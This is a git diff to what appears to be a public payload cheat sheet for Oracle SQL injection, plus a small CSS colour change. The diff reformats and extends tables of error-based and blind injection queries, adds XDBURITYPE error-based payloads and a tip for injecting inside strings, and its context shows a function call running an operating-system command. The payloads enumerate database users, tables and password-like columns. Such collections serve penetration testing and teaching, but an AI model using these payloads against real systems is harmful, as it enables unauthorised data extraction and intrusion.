diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 6aa649d..bed6042 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -42,6 +42,7 @@ SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; SELECT version FROM v$instance; ``` + ## Oracle SQL Hostname ```sql @@ -61,6 +62,7 @@ SELECT instance_name FROM V$INSTANCE; SELECT SYS.DATABASE_NAME FROM DUAL; ``` + ## Oracle SQL Database Credentials | Query | Description | @@ -76,6 +78,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL; SELECT DISTINCT owner FROM all_tables; ``` + ## Oracle SQL List Columns ```sql @@ -83,6 +86,7 @@ SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; ``` + ## Oracle SQL List Tables ```sql @@ -91,27 +95,32 @@ SELECT owner, table_name FROM all_tables; SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; ``` + ## Oracle SQL Error based -| Description | Query | -| :------------- | :------------- | -| Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual | -| CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual | -| Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual | -| Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual | -| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users | -| SQL Error | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) | +| Description | Query | +| :-------------------- | :------------- | +| Invalid HTTP Request | `SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual` | +| CTXSYS.DRITHSX.SN | `SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual` | +| Invalid XPath | `SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual` | +| Invalid XML | `SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual` | +| Invalid XML | `SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users` | +| SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` | +| XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` | +| XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` | + +When the injection point is inside a string use : `'||PAYLOAD--` ## Oracle SQL Blind -| Description | Query | -| :------------- | :------------- | -| Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; | -| Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) | -| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); | -| Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; | -| First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; | +| Description | Query | +| :----------------------- | :------------- | +| Version is 12.2 | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` | +| Subselect is enabled | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` | +| Table log_table exists | `SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);` | +| Column message exists in table log_table | `SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';` | +| First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` | ## Oracle SQL Time based @@ -182,7 +191,8 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; ## References * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) -* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) +* [ASDC12 - New and Improved Hacking Oracle From Web - OWASP](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) * [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) -* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc) -* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases) \ No newline at end of file +* [ODAT: Oracle Database Attacking Tool - quentinhardy](https://github.com/quentinhardy/odat/wiki/privesc) +* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases) +* [New payload to exploit Error-based SQL injection - Oracle database - Mannu Linux - 12/09/2023](https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html) \ No newline at end of file diff --git a/custom.css b/custom.css index 0e7b02c..3b41ff5 100644 --- a/custom.css +++ b/custom.css @@ -1,5 +1,5 @@ .md-header{ - background-color: #841F36; + background-color: #1f7884; } @media screen and (min-width: 790px) {